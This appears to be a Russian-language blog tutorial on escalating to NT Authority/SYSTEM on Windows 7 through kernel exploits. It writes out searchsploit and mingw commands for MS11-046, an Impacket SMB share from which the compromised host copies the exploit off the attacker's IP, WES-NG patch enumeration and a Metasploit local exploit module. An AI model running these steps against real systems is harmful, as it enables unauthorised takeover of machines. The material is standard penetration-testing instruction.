Здравствуйте, дорогие друзья.
Продолжаем рассматривать повышение привилегий в Windows, и на этот раз остановимся на эксплойте ядра.
Я пишу этот пост, чтобы объяснить практику использования команд для эксплуатации в режиме ядра.
Содержание
· Что такое ядро?
· Предварительное условие
· Охота на уязвимое ядро
· Методы повышения привилегий ядра
- Эксплойт ядра с использованием Metasploit
- Эксплойт ядра с использованием ExploitDB
Что такое ядро?
Ядро — это компьютерная программа, которая служит ядром или сердцем операционной системы. Она управляет управлением памятью, управлением задачами и управлением дисками.
Операционная система имеет следующие отдельные пространства:
· Пространство ядра: ядро обычно поддерживается и загружается в отдельную область памяти, называемую защищенным пространством ядра. Оно защищено от доступа со стороны прикладных программ или менее важных компонентов операционной системы.
· Пользовательское пространство. Операционная система (ОС) — это программное обеспечение, которое действует как мост между аппаратными компонентами и конечным пользователем. Память пользовательского пространства используется прикладными программами, такими как браузер, текстовый процессор, аудио- и видеоплеер.
Методы повышения привилегий ядра
В ядре Windows, на удаленном хосте, существует уязвимость, позволяющая повысить привилегии. В случае успешной эксплуатации злоумышленник, имеющий локальные полномочия, может запустить специально созданную программу режима ядра и получить контроль над машиной.
Тактика: повышение привилегий
Платформы: Windows
Предварительное условие
Целевая машина: Windows 7.
Машина злоумышленника: Kali Linux
Условие: скомпрометируйте целевую машину с низким уровнем привилегий, используя Metasploit, Netcat и т. д.
Цель: повысить привилегии NT Authority/SYSTEM для пользователя с низкими привилегиями, используя ядро.
Охота на уязвимое ядро
Злоумышленник всегда будет искать повышение привилегий, если встроено перечисление уязвимых ядер. Это может быть возможно путем внедрения скрипта Python или PowerShell. Он выполняет перечисление на основе номера сборки и может возвращать идентификатор CVE, чтобы легко использовать компьютер и получить доступ к администратору. Доступ.
Эксплойт ядра с использованием ExploitDB
Как только злоумышленник установит обратное соединение, он сможет перечислить ядро, построенное, как показано на изображении ниже.
Это поможет ему обнаружить связанный с ним эксплойт, если он уязвим.
Мы обнаружили, что соответствующая версия ядра уязвима в MS11-046 (CVE: 2011-1249).
То же самое можно перечислить с помощью searchsploit, который также считается автономной версией ExploitDB. Как показано ниже, мы можем загрузить тот же эксплойт из его автономной версии.
searchsploit 40564
i686-w64-mingw32-gcc 40564.c –o 40564.exe –lws2_32
Давайте запустим службу SMB Share в новом терминале с помощью скрипта Python Impacket, как показано ниже:
impacket-smbserver share $(pwd)
Это поможет нам импортировать эксплойт внутрь скомпрометированных оболочек, с помощью команды копирования:
copy \\192.168.1.3\share\40564.exe
Как только эксплойт будет загружен, мы сможем запустить эту программу, чтобы получить привилегированную оболочку как NT Authority/system.
Эксплойт ядра с использованием Metasploit
После того, как Вы перечислили построенное ядро, Вы можете использовать Google, чтобы получить доступный эксплойт, тогда как Вы можете загрузить Windows Exploit Offerer — Next Generation (WES-NG) в свою систему Kali Linux, которая будет искать доступный эксплойт для встроенного уязвимого ядра. Вы можете скачать этот скрипт из библиотеки Github.
git clone https://github.com/bitsadmin/wesng
cd wesng
Примечание. Существует два варианта проверки отсутствия исправлений: а. Запустите файл Missingkbs.vbs на хосте, чтобы Windows определила, какие исправления отсутствуют. b. Используйте встроенный в Windows инструмент systeminfo.exe для получения системной информации локальной системы или из удаленной системы с помощью systeminfo /S MyRemoteHost и перенаправьте ее в файл: systeminfo > systeminfo.txt
Поскольку мы сохранили выходную системную информацию в текстовом файле и назвали ее systeminfo.txt. Далее мы использовали эту информацию для запуска скрипта wes.py.
python wes.py /root/systeminfo.txt
В результате он попытается определить недостающие исправления и сообщить об имеющихся уязвимостях и влиянии рисков. На приведенном ниже изображении, Вы можете видеть, что на нем есть указанная ссылка на эксплойт, доступная в базе данных эксплойта.
На этот раз мы будем использовать Metasploit для последующей эксплуатации и искать привилегированную оболочку с привилегиями NT Authority.
use exploit/windows/local/ms16_014_wmi_rec_notif
set session 1
exploit
В случае успешного выполнения будет предоставлена оболочка для административных привилегий.
На этом все. Всем хорошего дня.